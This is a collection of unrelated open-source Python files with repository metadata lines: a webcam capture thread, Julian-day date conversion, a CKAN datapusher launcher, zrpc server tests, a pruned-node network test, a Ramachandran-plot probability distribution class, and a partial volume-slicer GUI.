self._device_name = None
def setDevice(self, device):
self._device_name = device
def openStream(self):
logging.debug("Opening stream.")
try:
self._stream = v4l2capture.Video_device("/dev/"+self._device_name)
except IOError as err_pref:
logging.debug("Could not open default device.")
devices = [x for x in os.listdir("/dev/") if x.startswith("video")]
devices.sort()
for device_new in devices:
try:
self._stream = v4l2capture.Video_device("/dev/"+device_new)
except IOError as err_new:
pass
else:
logging.warning("Device {default} was not available but {new} could be opened.".format(default=self._device_name, new=device_new))
self._device_name = device_new
return
raise err_pref
else:
return
def setupStream(self):
with self._conf_lock:
self._stream.set_format(self._conf["capture-res"][0], self._conf["capture-res"][1], fourcc='MJPG')
self._stream.create_buffers(1)
self._stream.queue_all_buffers()
def newConf(self):
self._new_conf.set()
def run(self):
self._stop.clear()
with self._conf_lock:
conf = self._conf.copy() # Create thread-safe local copy
sleep(float(conf["capture-warmup"])) # Camera warm-up wait
while True :
if self._stop.is_set():
break
if self._new_conf.is_set():
with self._conf_lock:
conf = self._conf.copy()
self._new_conf.clear()
logging.debug("New configuration set: {conf}".format(conf=conf))
if conf["capture"]:
if self._stream is None:
if self.tryOpenStream() is FAIL:
continue
try:
select.select((self._stream,), (), ())
raw = self._stream.read_and_queue()
except IOError as err_first:
self._stream.close()
self.tryOpenStream()
continue
if raw is None:
logging.warning("Grabbed frame is empty.")
while True:
try:
self._out_queue.put(cv2.imdecode(np.fromstring(raw, dtype=np.byte), flags=cv2.IMREAD_COLOR), block=False)
except Full:
self._out_queue.get()
else:
break
else:
sleep(1) # Reduce CPU consumption
if self._stream is not None:
self._stream.close()
logging.info("Thread stopped.")
def tryOpenStream(self):
try:
self.openStream()
except IOError as err:
with self._conf_lock:
self._conf["capture"] = False
self._conf["error"]["capture"] = True
self._stream = None
self.newConf()
logging.error("Capture disabled: could not open stream, no device available.")
return FAIL
else:
self.setupStream()
self._stream.start()
return (not FAIL)
def stop(self):
self._stop.set()
| bsd-3-clause | 8,370,857,560,826,415,000 | 31.088889 | 150 | 0.511311 | false |
mpercich/Calendarize | ios/dateparser/lib/python2.7/site-packages/convertdate/julianday.py | 1 | 1740 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of convertdate.
# http://github.com/fitnr/convertdate
# Licensed under the GPL-v3.0 license:
# http://opensource.org/licenses/MIT
# Copyright (c) 2016, fitnr <fitnr@fakeisthenewreal>
from datetime import datetime
from . import gregorian
from . import julian
from pytz import utc
def to_datetime(jdc):
'''Return a datetime for the input floating point Julian Day Count'''
year, month, day = gregorian.from_jd(jdc)
# in jdc: 0.0 = noon, 0.5 = midnight
# the 0.5 changes it to 0.0 = midnight, 0.5 = noon
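    # e.g. jdc = 2451545.0 (the J2000 epoch) gives frac = 0.5, i.e. 12:00 noon
    # on 2000-01-01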
frac = (jdc + 0.5) % 1
hours = int(24 * frac)
mfrac = frac * 24 - hours
mins = int(60 * round(mfrac, 6))
sfrac = mfrac * 60 - mins
secs = int(60 * round(sfrac, 6))
msfrac = sfrac * 60 - secs
# down to ms, which are 1/1000 of a second
ms = int(1000 * round(msfrac, 6))
return datetime(year, month, day, int(hours), int(mins), int(secs), int(ms), tzinfo=utc)
def from_datetime(dt):
# take account of offset (if there isn't one, act like it's utc)
try:
dt = dt + dt.utcoffset()
except TypeError:
# Assuming UTC
pass
jdc = gregorian.to_jd(dt.year, dt.month, dt.day)
hfrac = dt.hour / 24.
mfrac = round(dt.minute / (24. * 60), 5)
sfrac = round(dt.second / (24. * 60 * 60), 5)
msfrac = dt.microsecond / (24. * 60 * 60 * 1000)
return jdc + hfrac + mfrac + sfrac + msfrac
def to_gregorian(jdc):
return gregorian.from_jd(jdc)
def from_gregorian(year, month, day):
return gregorian.to_jd(year, month, day)
def to_julian(jdc):
return julian.from_jd(jdc)
def from_julian(year, month, day):
return julian.to_jd(year, month, day)
| mit | -8,246,665,454,322,578,000 | 23.166667 | 92 | 0.624713 | false |
ckan/datapusher | datapusher/main.py | 1 | 1147 | import os
import six
import ckanserviceprovider.web as web
from datapusher import jobs
# check whether jobs have been imported properly
assert(jobs.push_to_datastore)
def serve():
web.init()
web.app.run(web.app.config.get('HOST'), web.app.config.get('PORT'))
def serve_test():
web.init()
return web.app.test_client()
def main():
import argparse
argparser = argparse.ArgumentParser(
description='Service that allows automatic migration of data to the CKAN DataStore',
epilog='''"He reached out and pressed an invitingly large red button on a nearby panel.
The panel lit up with the words Please do not press this button again."''')
if six.PY3:
argparser.add_argument('config', metavar='CONFIG', type=argparse.FileType('r'),
help='configuration file')
if six.PY2:
argparser.add_argument('config', metavar='CONFIG', type=file,
help='configuration file')
args = argparser.parse_args()
os.environ['JOB_CONFIG'] = os.path.abspath(args.config.name)
serve()
if __name__ == '__main__':
main()
| agpl-3.0 | 794,481,854,645,896,600 | 27.675 | 95 | 0.644289 | false |
zacharyvoase/zrpc | tests/server_test.py | 1 | 4208 | from __future__ import with_statement
from contextlib import contextmanager
from Queue import Queue
import threading
from bson import BSON
from nose.tools import assert_equal
import zmq
from zrpc.concurrency import Callback
from zrpc.server import Server
from zrpc.registry import Registry
REGISTRY = Registry()
class Unserializable(object):
def __repr__(self):
return '<unserializable>'
@REGISTRY.method
def add(x, y):
return x + y
@REGISTRY.method
def raises_error():
raise Exception("some error occurred")
@REGISTRY.method
def returns_bson_unserializable_obj():
return Unserializable()
@contextmanager
def server(addr, registry, connect=False, context=None):
context = context or zmq.Context.instance()
# Set up a server, tell it to run in a separate thread, and pass in a
# callback so that we can wait for the server to be bound before connecting
# our client. This avoids an issue we were having with inproc:// transport,
# wherein if the client connected before the server had bound, it would
# raise an error.
callback = Callback()
server = Server(addr, registry, connect=connect, context=context)
server_thread = threading.Thread(
target=server.run,
kwargs=dict(callback=callback))
server_thread.daemon = True
server_thread.start()
server_socket = callback.wait()
try:
yield
finally:
context.term()
@contextmanager
def get_client(addr, context=None):
context = context or zmq.Context.instance()
client = context.socket(zmq.REQ)
client.connect(addr)
try:
yield client
finally:
client.close()
@contextmanager
def server_and_client(addr, registry, connect=False, context=None):
context = context or zmq.Context.instance()
with server(addr, registry, connect=connect, context=context):
with get_client(addr, context=context) as client:
yield client
def test_server_responds_correctly():
with server_and_client('inproc://zrpc', REGISTRY) as client:
client.send(BSON.encode({
"id": "abc",
"method": "add",
"params": [3, 4]}))
assert_equal(BSON(client.recv()).decode(),
{"id": "abc", "result": 7, "error": None})
def test_missing_method_returns_an_error():
with server_and_client('inproc://zrpc', REGISTRY) as client:
client.send(BSON.encode({
"id": "abc",
"method": "doesnotexist",
"params": [3, 4]}))
assert_equal(BSON(client.recv()).decode(),
{"id": "abc",
"result": None,
"error": {
"type": "zrpc.exceptions.MissingMethod",
"args": ["doesnotexist"],
"message": "MissingMethod: doesnotexist"
}})
def test_errors_raised_in_method_are_returned():
with server_and_client('inproc://zrpc', REGISTRY) as client:
client.send(BSON.encode({
"id": "abc",
"method": "raises_error",
"params": []}))
assert_equal(BSON(client.recv()).decode(),
{"id": "abc",
"result": None,
"error": {
"type": "exceptions.Exception",
"args": ["some error occurred"],
"message": "Exception: some error occurred"
}})
def test_bson_unserializable_objects_returned_raise_an_error():
with server_and_client('inproc://zrpc', REGISTRY) as client:
client.send(BSON.encode({
"id": "abc",
"method": "returns_bson_unserializable_obj",
"params": []}))
assert_equal(BSON(client.recv()).decode(),
{"id": "abc",
"result": None,
"error": {
"type": "bson.errors.InvalidDocument",
"args": ["Cannot encode object: <unserializable>"],
"message": "InvalidDocument: Cannot encode object: <unserializable>"
}})
| unlicense | -380,070,639,397,219,400 | 29.492754 | 94 | 0.568679 | false |
biblepay/biblepay | test/functional/node_network_limited.py | 1 | 5097 | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
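# Illustrative note (not part of the upstream test): with the standard service
# bits NODE_BLOOM = 1 << 2 = 4 and NODE_NETWORK_LIMITED = 1 << 10 = 1024, a
# pruned node here should advertise 4 | 1024 = 1028, which is the value
# asserted against firstAddrnServices in run_test below.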
from test_framework.messages import CInv, msg_getdata, NODE_BLOOM, NODE_NETWORK_LIMITED, msg_verack
from test_framework.mininode import NetworkThread, P2PInterface, wait_until, mininode_lock, network_thread_start, network_thread_join
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, disconnect_nodes, connect_nodes_bi, sync_blocks
import sys
class P2PIgnoreInv(P2PInterface):
firstAddrnServices = 0
def on_inv(self, message):
# The node will send us invs for other blocks. Ignore them.
pass
def on_addr(self, message):
self.firstAddrnServices = message.addrs[0].nServices
def wait_for_addr(self, timeout=5):
test_function = lambda: self.last_message.get("addr")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def send_getdata_for_block(self, blockhash):
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, int(blockhash, 16)))
self.send_message(getdata_request)
class NodeNetworkLimitedTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.stderr = sys.stdout
self.extra_args = [['-prune=550', '-txindex=0', '-addrmantest'], [], []]
def disconnect_all(self):
disconnect_nodes(self.nodes[0], 1)
disconnect_nodes(self.nodes[1], 0)
disconnect_nodes(self.nodes[2], 1)
disconnect_nodes(self.nodes[2], 0)
disconnect_nodes(self.nodes[0], 2)
disconnect_nodes(self.nodes[1], 2)
def setup_network(self):
super(NodeNetworkLimitedTest, self).setup_network()
self.disconnect_all()
def run_test(self):
node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
network_thread_start()
node.wait_for_verack()
expected_services = NODE_BLOOM | NODE_NETWORK_LIMITED
self.log.info("Check that node has signalled expected services.")
assert_equal(node.nServices, expected_services)
self.log.info("Check that the localservices is as expected.")
assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)
self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
connect_nodes_bi(self.nodes, 0, 1)
blocks = self.nodes[1].generate(292)
sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Make sure we can max retrive block at tip-288.")
node.send_getdata_for_block(blocks[1]) # last block in valid range
node.wait_for_block(int(blocks[1], 16), timeout=3)
self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
node.send_getdata_for_block(blocks[0]) # first block outside of the 288+2 limit
node.wait_for_disconnect(5)
self.log.info("Check local address relay, do a fresh connection.")
self.nodes[0].disconnect_p2ps()
network_thread_join()
node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
network_thread_start()
node1.wait_for_verack()
node1.send_message(msg_verack())
node1.wait_for_addr()
#must relay address with NODE_NETWORK_LIMITED
assert_equal(node1.firstAddrnServices, 1028) # Not 1036 like bitcoin, because NODE_WITNESS = 1 << 3 = 8
self.nodes[0].disconnect_p2ps()
node1.wait_for_disconnect()
# connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer
# because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible
connect_nodes_bi(self.nodes, 0, 2)
try:
sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
except:
pass
        # node2 must remain at height 0
assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)
# now connect also to node 1 (non pruned)
connect_nodes_bi(self.nodes, 1, 2)
# sync must be possible
sync_blocks(self.nodes)
# disconnect all peers
self.disconnect_all()
# mine 10 blocks on node 0 (pruned node)
self.nodes[0].generate(10)
# connect node1 (non pruned) with node0 (pruned) and check if the can sync
connect_nodes_bi(self.nodes, 0, 1)
# sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED)
sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
NodeNetworkLimitedTest().main()
| mit | 9,119,730,293,349,596,000 | 40.778689 | 134 | 0.665686 | false |
KarlTDebiec/Ramaplot | PDistDataset.py | 1 | 20943 | # -*- coding: utf-8 -*-
# ramaplot.PDistDataset.py
#
# Copyright (C) 2015 Karl T Debiec
# All rights reserved.
#
# This software may be modified and distributed under the terms of the
# BSD license. See the LICENSE file for details.
"""
Manages probability distribution datasets.
"""
################################### MODULES ###################################
from __future__ import absolute_import,division,print_function,unicode_literals
from .myplotspec.Dataset import Dataset
################################### CLASSES ###################################
class PDistDataset(Dataset):
"""
Manages probability distribution datasets.
Generates probability distribution from series of Φ/Ψ values,
representing either the probability of Φ/Ψ, or the expectation value
of a selected measurement (e.g. energy) at that Φ/Ψ.
    Input data should be provided in a whitespace-delimited text file
including columns for Φ, Ψ, and any additional data, such as this
output from `cpptraj`'s `multidihedral` command::
#Frame phi:2 psi:2 chip:2 ...
1 -62.1431 144.6768 72.2964 ...
2 -63.2487 151.6551 71.9101 ...
... ... ... ...
"""
@classmethod
def get_cache_key(cls, infile, phikey="phi", psikey="psi",
zkey="free energy", mode="hist", bins=72, bandwidth=5, wrap=True,
mask_cutoff=None,
calc_populations=False, plot_populations=False,
*args, **kwargs):
"""
Generates tuple of arguments to be used as key for dataset
cache.
Arguments documented under :func:`__init__`.
"""
from os.path import expandvars
if zkey in ["free energy", "probability"]:
x_bins, y_bins = cls.process_bins_arg(bins, dim=2)
bins = (tuple(x_bins), tuple(y_bins))
else:
x_bins, y_bins, z_bins = cls.process_bins_arg(bins, dim=3)
bins = (tuple(x_bins), tuple(y_bins), tuple(z_bins))
if mode == "hist":
return (cls, expandvars(infile), phikey, psikey, zkey, mode, bins,
wrap, mask_cutoff, calc_populations, plot_populations)
elif mode == "kde":
return (cls, expandvars(infile), phikey, psikey, zkey, mode, bins,
bandwidth, wrap, mask_cutoff, calc_populations,
plot_populations)
@staticmethod
def process_bins_arg(bins, dim=2):
"""
Processes bin argument.
Arguments:
bins (int, list, ndarray): Bins to use for histogram or grid
to use for kernel density estimate; if int, number of bins
                or grid points between -180° and 180° in Φ and Ψ, if list
or ndarray, bins or grid directly
Returns:
out_bins (tuple): Processed bins
"""
import numpy as np
if dim == 2:
if isinstance(bins, int):
x_bins = y_bins = np.linspace(-180, 180, bins + 1)
elif isinstance(bins, list):
if len(bins) == 2:
if isinstance(bins[0], int):
x_bins = np.linspace(-180, 180, bins[0] + 1)
elif isinstance(bins[0], list):
x_bins = np.array(bins[0])
if isinstance(bins[1], int):
y_bins = np.linspace(-180, 180, bins[1] + 1)
elif isinstance(bins[1], list):
y_bins = np.array(bins[1])
else:
x_bins = y_bins = np.array(bins)
elif isinstance(bins, np.ndarray):
x_bins = y_bins = bins
return x_bins, y_bins
elif dim == 3:
if isinstance(bins, int):
x_bins = y_bins = z_bins = np.linspace(-180, 180, bins + 1)
elif isinstance(bins, list):
if len(bins) == 2:
if isinstance(bins[0], int):
x_bins = y_bins = np.linspace(-180, 180, bins[0] + 1)
elif (isinstance(bins[0], list)
or isinstance(bins[0], np.ndarray)):
x_bins = y_bins = np.array(bins[0])
if isinstance(bins[1], int):
z_bins = np.linspace(-180, 180, bins[1] + 1)
elif (isinstance(bins[1], list)
or isinstance(bins[1], np.ndarray)):
z_bins = np.array(bins[1])
elif len(bins) == 3:
if isinstance(bins[0], int):
x_bins = np.linspace(-180, 180, bins[0] + 1)
elif (isinstance(bins[0], list)
or isinstance(bins[0], np.ndarray)):
x_bins = np.array(bins[0])
if isinstance(bins[1], int):
y_bins = np.linspace(-180, 180, bins[1] + 1)
elif (isinstance(bins[1], list)
or isinstance(bins[1], np.ndarray)):
y_bins = np.array(bins[1])
if isinstance(bins[2], int):
z_bins = np.linspace(-180, 180, bins[2] + 1)
elif (isinstance(bins[2], list)
or isinstance(bins[2], np.ndarray)):
z_bins = np.array(bins[2])
else:
x_bins = y_bins = z_bins = np.array(bins)
elif isinstance(bins, np.ndarray):
x_bins = y_bins = z_bins = bins
return x_bins, y_bins, z_bins
else:
raise TypeError()
def __init__(self, phikey="phi", psikey="psi", zkey="free energy",
mode="hist", bins=72, bandwidth=5, wrap=True, mask_cutoff=None,
calc_populations=False, plot_populations=False,
verbose=1, debug=0, **kwargs):
"""
Arguments:
infile (str): Path to text input file, may contain environment
variables
phikey (str): Key from which to load Φ
psikey (str): Key from which to load Ψ
zkey (str): Key from which to load distribution; if 'free
energy' or 'probability', the 2D probability density of Φ
and Ψ will be calculated and the selected representation
returned; for other values a third dimension will be loaded
from the `zkey` column of `infile`, the 3D probability
density of Φ, Ψ, and `zkey` will be calculated, and the
expectation value of `zkey` as a function of Φ and Ψ will be
returned
mode (str): Method of calculating probability distribution;
may be either 'hist', to use a histogram, or 'kde', to use a
kernel density estimate
bins (int, list, ndarray): Bins to use for histogram or grid
to use for kernel density estimate; if int, number of bins
                or grid points between -180° and 180° in Φ and Ψ, if list
or ndarray, bins or grid directly
bandwidth (float, optional): Bandwidth to use for kernel
density estimate
wrap (bool): Wrap x and y coordinates between 180° and 360° to
between -180° and 0°
            wrap_z (bool): Wrap z coordinates between -180° and 0° to between 180°
and 360°; probably only useful for plotting ω
mask_cutoff (float): Cutoff beyond which distribution is
masked, if `zkey` is 'free energy', this is a the maximum
free energy above which the mask will be set, and if `zkey`
is 'probability', this is the minimum probability below
which the mask will be set
hist_kw: Keyword arguments passed to numpy.histogram2d or
numpy.histogramdd
kde_kw: Keyword arguments passed to
sklearn.neighbors.KernelDensity
verbose (int): Level of verbose output
debug (int): Level of debug output
kwargs (dict): Additional keyword arguments
.. todo:
- Fix and validate 3D KDE
- Auto-detect phikey and psikey
            - Support periodic kernel density estimate
- Support variable bandwidth kernel density estimate
"""
import numpy as np
import pandas as pd
from .myplotspec import multi_get_copy
# Manage arguments
if str(mode.lower()) not in ["hist", "kde", "none"]:
raise ValueError("Argument 'mode' does not support provided " +
"value '{0}', may be 'hist', 'kde', or 'none'".format(mode))
read_csv_kw = dict(delim_whitespace=True, index_col=0)
read_csv_kw.update(kwargs.pop("read_csv_kw", {}))
# Load data
dataframe = self.load_dataset(verbose=verbose, debug=debug,
read_csv_kw=read_csv_kw, **kwargs).dataframe
if wrap:
dataframe[phikey][dataframe[phikey] > 180] -= 360
dataframe[psikey][dataframe[psikey] > 180] -= 360
# Option 0: Store Φ, Ψ
if mode == "none":
# Store data in instance variable
self.x = dataframe[phikey]
self.y = dataframe[psikey]
# Option 1: Calculate probability and free energy of Φ, Ψ
elif zkey in ["free energy", "probability"]:
x_bins, y_bins = self.process_bins_arg(bins, dim=2)
x_centers = (x_bins[:-1] + x_bins[1:]) / 2
y_centers = (y_bins[:-1] + y_bins[1:]) / 2
x_width = np.mean(x_centers[1:] - x_centers[:-1])
y_width = np.mean(y_centers[1:] - y_centers[:-1])
# Option 1a: Use a histogram (fast but noisy)
if mode == "hist":
if verbose >= 1:
print("calculating probability distribution of " +
"'{0}' and '{1}' using a ".format(phikey, psikey) +
"histogram")
hist_kw = dict(normed=False)
hist_kw.update(kwargs.get("hist_kw", {}))
hist_kw["bins"] = hist_kw.get("bins", [x_bins, y_bins])
probability, _, _ = np.histogram2d(
dataframe[phikey], dataframe[psikey], **hist_kw)
# Option 1b: Use a kernel density estimate (smooth but slow)
elif mode == "kde":
if verbose >= 1:
print("calculating probability distribution of " +
"'{0}' and '{1}' using a ".format(phikey, psikey) +
"kernel density estimate")
from sklearn.neighbors import KernelDensity
kde_kw = multi_get_copy("kde_kw", kwargs, {})
kde_kw["bandwidth"] = kde_kw.get("bandwidth", bandwidth)
xg, yg = np.meshgrid(x_centers, y_centers)
xyg = np.vstack([yg.ravel(), xg.ravel()]).T
samples = np.column_stack((dataframe[phikey],
dataframe[psikey]))
kde = KernelDensity(**kde_kw)
kde.fit(samples)
probability_series = np.exp(kde.score_samples(xyg))
probability = np.zeros((x_centers.size, y_centers.size))
for phi, psi, p in np.column_stack((xyg, probability_series)):
x_index = np.where(x_centers == phi)[0][0]
y_index = np.where(y_centers == psi)[0][0]
probability[x_index, y_index] = p
# Normalize and calculate free energy
probability /= np.nansum(probability)
free_energy = -1 * np.log(probability)
free_energy[np.isinf(free_energy)] = np.nan
free_energy -= np.nanmin(free_energy)
# Store data in instance variable
self.x_centers = x_centers
self.y_centers = y_centers
self.x_width = x_width
self.y_width = y_width
self.x_bins = x_bins
self.y_bins = y_bins
self.x = dataframe[phikey]
self.y = dataframe[psikey]
# Option 2: Calculate mean value of a third observable as a
# function of Φ, Ψ
else:
x_bins, y_bins, z_bins = self.process_bins_arg(bins, dim=3)
x_centers = (x_bins[:-1] + x_bins[1:]) / 2
y_centers = (y_bins[:-1] + y_bins[1:]) / 2
z_centers = (z_bins[:-1] + z_bins[1:]) / 2
x_width = np.mean(x_centers[1:] - x_centers[:-1])
y_width = np.mean(y_centers[1:] - y_centers[:-1])
if kwargs.get("wrap_z"):
dataframe[zkey][dataframe[zkey] < 0] += 360
# Option 2a: Use a histogram (fast but noisy)
if mode == "hist":
if verbose >= 1:
print("calculating mean value of '{0}'".format(zkey) +
"as a function of '{0}' and ".format(phikey) +
"'{0}' using a histogram".format(psikey))
hist_kw = dict(normed=True)
hist_kw.update(kwargs.get("hist_kw", {}))
hist_kw["bins"] = hist_kw.get("bins", [x_bins, y_bins, z_bins])
prob_xyz, _ = np.histogramdd(np.column_stack(
(dataframe[phikey], dataframe[psikey], dataframe[zkey])),
**hist_kw)
probability = np.sum(prob_xyz, axis=2)
prob_z_given_xy = prob_xyz / probability[:,:,np.newaxis]
weighted_z = prob_z_given_xy*z_centers[np.newaxis,np.newaxis,:]
mean_z = np.sum(weighted_z, axis=2)
# Option 2b: Use a kernel density estimate (smooth but slow)
elif mode == "kde":
                raise NotImplementedError("3D KDE mode is not yet validated")
from copy import copy
from sklearn.neighbors import KernelDensity
kde_kw = multi_get_copy("kde_kw", kwargs, {})
kde_kw["bandwidth"] = kde_kw.get("bandwidth", bandwidth)
# Only a single bandwidth is supported; scale z
# dimension to span range of 120-240
# scale_range = 340
z = copy(dataframe[zkey])
# z -= z.min() # shift bottom to 0
# z_range = z.max() # save max
# z *= (scale_range / z_range)
# z += (360 - scale_range) / 2 # Give buffer on top and bottom
xg, yg, zg = np.meshgrid(x_centers, y_centers, z_centers)
xyzg = np.vstack([xg.ravel(), yg.ravel(), zg.ravel()]).T
samples = np.column_stack((dataframe[phikey],
dataframe[psikey], z))
kde = KernelDensity(**kde_kw)
kde.fit(samples)
probability_series = np.exp(kde.score_samples(xyzg))
prob_xyz = np.zeros((x_centers.size, y_centers.size,
z_centers.size), np.float) * np.nan
for phi,psi,z,p in np.column_stack((xyzg, probability_series)):
x_index = np.where(x_centers == phi)[0][0]
y_index = np.where(y_centers == psi)[0][0]
z_index = np.where(z_centers == z)[0][0]
prob_xyz[x_index, y_index, z_index] = p
prob_xyz /= np.sum(prob_xyz)
probability = np.sum(prob_xyz, axis=2)
prob_z_given_xy = prob_xyz / probability[:,:,np.newaxis]
weighted_z = prob_z_given_xy*z_centers[np.newaxis,np.newaxis,:]
mean_z = np.sum(weighted_z, axis=2)
# mean_z -= (360 - scale_range) / 2 # Shift back down
# mean_z *= (z_range / scale_range) # Back from degrees to E
# free_energy *= 627.503 # Convert to kcal/mol
# Normalize and calculate free energy
probability /= np.nansum(probability)
free_energy = -1 * np.log(probability)
free_energy[np.isinf(free_energy)] = np.nan
free_energy -= np.nanmin(free_energy)
# Store data in instance variable
self.x_centers = x_centers
self.y_centers = y_centers
self.x_width = x_width
self.y_width = y_width
self.x_bins = x_bins
self.y_bins = y_bins
self.x = dataframe[phikey]
self.y = dataframe[psikey]
# Prepare mask
if mode == "none":
pass
elif zkey == "probability":
self.dist = probability
if mask_cutoff is not None:
self.mask = np.ma.masked_where(np.logical_and(
probability >= mask_cutoff,
np.logical_not(np.isnan(probability))),
np.ones_like(probability))
else:
self.mask = np.ma.masked_where(
np.logical_not(np.isnan(free_energy)),
np.ones_like(free_energy))
elif zkey == "free energy":
self.dist = free_energy
if mask_cutoff is not None:
self.mask = np.ma.masked_where(np.logical_and(
free_energy <= mask_cutoff,
np.logical_not(np.isnan(free_energy))),
np.ones_like(free_energy))
else:
self.mask = np.ma.masked_where(
np.logical_not(np.isnan(free_energy)),
np.ones_like(free_energy))
else:
self.dist = mean_z
if mask_cutoff is not None:
self.mask = np.ma.masked_where(np.logical_and(
free_energy <= mask_cutoff,
np.logical_not(np.isnan(free_energy))),
np.ones_like(free_energy))
else:
self.mask = np.ma.masked_where(
np.logical_not(np.isnan(free_energy)),
np.ones_like(free_energy))
# Calculate state populations
if calc_populations:
states = kwargs.get("states", [
("β", -151, 151),
("PPII", -66, 140),
("ξ", -145, 55),
("γ'", -81, 65),
("α", -70, -25),
("$L_α$", 55, 45),
("γ", 73, -35),
("PPII'", 56, -124),
("plateau", -100, -130)])
state_radius = kwargs.get("state_radius", 45)
distances = np.zeros((len(states), len(x_centers), len(y_centers)))
xs = []
ys = []
for i, (state, x, y) in enumerate(states):
xs += [x]
ys += [y]
# There must be a better way to do this, but this works
for j, xc in enumerate(x_centers):
for k, yc in enumerate(y_centers):
                    # Minimum-image separation on the periodic -180..180 range
                    dx = abs(xc - x)
                    if dx >= 180:
                        dx = 360 - dx
                    dy = abs(yc - y)
                    if dy >= 180:
                        dy = 360 - dy
                    distances[i,j,k] = np.sqrt(dx**2 + dy**2)
assignments = np.argmin(distances, axis=0)
assignments[np.min(distances, axis=0) >= state_radius] = \
len(states) + 1
index, state_populations = [], []
for i, (state, x, y) in enumerate(states):
index += [state]
state_populations += [(x, y,
np.nansum(probability[assignments==i]))]
state_populations = pd.DataFrame(state_populations, index=index,
columns=["Φ center", "Ψ center", "population"])
self.state_populations = state_populations
if verbose >= 1:
print(state_populations)
if plot_populations:
self.dist = assignments
self.mask = np.ma.masked_where(
np.logical_not(assignments == len(states) + 1),
np.ones_like(assignments))
self.x = np.array(xs)
self.y = np.array(ys)
label, label_kw = [], []
from .myplotspec import multi_get_copy
default_label_kw = multi_get_copy(["default_label_kw",
"label_kw"], kwargs, {})
for index, row in state_populations.iterrows():
label += ["{0}\n{1:2d}%".format(index,
int(row["population"]*100))]
label_kw += [default_label_kw.copy()]
label_kw[-1]["x"] = row["Φ center"]
label_kw[-1]["y"] = row["Ψ center"]
self.label = label
self.label_kw = label_kw
| bsd-3-clause | 1,198,580,034,747,305,000 | 43.743041 | 80 | 0.494664 | false |
mattcieslak/DSI2 | dsi2/ui/volume_slicer.py | 1 | 10860 | #!/usr/bin/env python
import numpy as np
import nibabel as nib
# Traits stuff
from traits.api import ( HasTraits, Instance, Array,
Bool, Dict, on_trait_change, Range, Color, Any, Int,
DelegatesTo, CInt, Property, File )
from traitsui.api import View, Item, VGroup, \
HGroup, Group, RangeEditor, ColorEditor, VSplit
from mayavi import mlab
from mayavi.core.api import PipelineBase, Source
from mayavi.core.ui.api import SceneEditor
from mayavi.tools.mlab_scene_model import MlabSceneModel
from tvtk.pyface.scene import Scene
from tvtk.api import tvtk
from chaco.chaco_plot_editor import ChacoPlotItem
from chaco.api import Plot, ArrayPlotData, gray
from enable.component_editor import ComponentEditor
from ..streamlines.track_math import sphere_around_ijk
from ..volumes.scalar_volume import ScalarVolume
from .chaco_slice import Slices
import os
from ..volumes import get_MNI152
class SlicerPanel(HasTraits):
# path to a nifti file that holds the data
reference_volume = File
scene3d_inited = Bool(False)
# MNI_152 objects. data holds the np array, data_src is for mayavi
data = Array(value=np.zeros((50,50,50)))
data_src = Instance(Source)
# --- Sphere configuration ---
# position of the cursor
# Radius of the sphere
radius = Range(low=0,high=14,value=1)
extent_x = Int(50)
extent_y = Int(50)
extent_z = Int(50)
sphere_x = Range(low=0, high='extent_x')
sphere_y = Range(low=0, high='extent_y')
sphere_z = Range(low=0, high='extent_z')
sphere_coords = Array
sphere_color = Color((255,0,0,255))
sphere_visible = Bool(True)
coordsupdated = Int(0)
# Spere's representation on the screen
sphere_viz = Instance(PipelineBase)
widgets_drawn = Bool(False)
x_slice_plane = Instance(PipelineBase)
y_slice_plane = Instance(PipelineBase)
z_slice_plane = Instance(PipelineBase)
# Slice plots
slice_plots = Instance(Slices)
x = DelegatesTo('slice_plots')
y = DelegatesTo('slice_plots')
z = DelegatesTo('slice_plots')
# 3d image plane widget
scene3d = Instance(MlabSceneModel, ())
camera_initialized = False
def __init__(self, **traits):
""" Creates a panel for viewing a 3d Volume.
Parameters:
===========
"""
super(SlicerPanel,self).__init__(**traits)
self.sphere_coords
self.scene3d
self.sphere_viz
@on_trait_change("reference_volume")
def render_volume(self):
if not os.path.exists(self.reference_volume):
print "No such file", self.reference_volume
return
print "Opening", self.reference_volume
try:
data = nib.load(self.reference_volume)
except Exception, e:
print "Unable to load data", e
return
# Remove imageplane widgets
self.scene3d.disable_render = True
if self.widgets_drawn:
self.x_slice_plane.remove()
self.y_slice_plane.remove()
self.z_slice_plane.remove()
# Set data and update the data_src
self.data = data.get_data()
# Change the extents to match the new volume
self.extent_x, self.extent_y, self.extent_z = self.data.shape
# Send to mayavi
self.data_src = mlab.pipeline.scalar_field(self.data,
figure=self.scene3d.mayavi_scene,
name='Data',colormap="gray")
# Send the new data to the slices
self.slice_plots.set_volume(self.data)
# Update the sphere to be in the middle of this volume
self.sphere_x = self.extent_x / 2
self.sphere_y = self.extent_y / 2
self.sphere_z = self.extent_z / 2
self.x_slice_plane = self.make_x_slice_plane()
self.x_slice_plane.ipw.sync_trait(
"slice_position", self, alias="x")
self.x_slice_plane.ipw.sync_trait(
"enabled", self.slice_plots, alias="x_slice_plane_visible")
self.y_slice_plane = self.make_y_slice_plane()
self.y_slice_plane.ipw.sync_trait(
"slice_position", self, alias="y")
self.y_slice_plane.ipw.sync_trait(
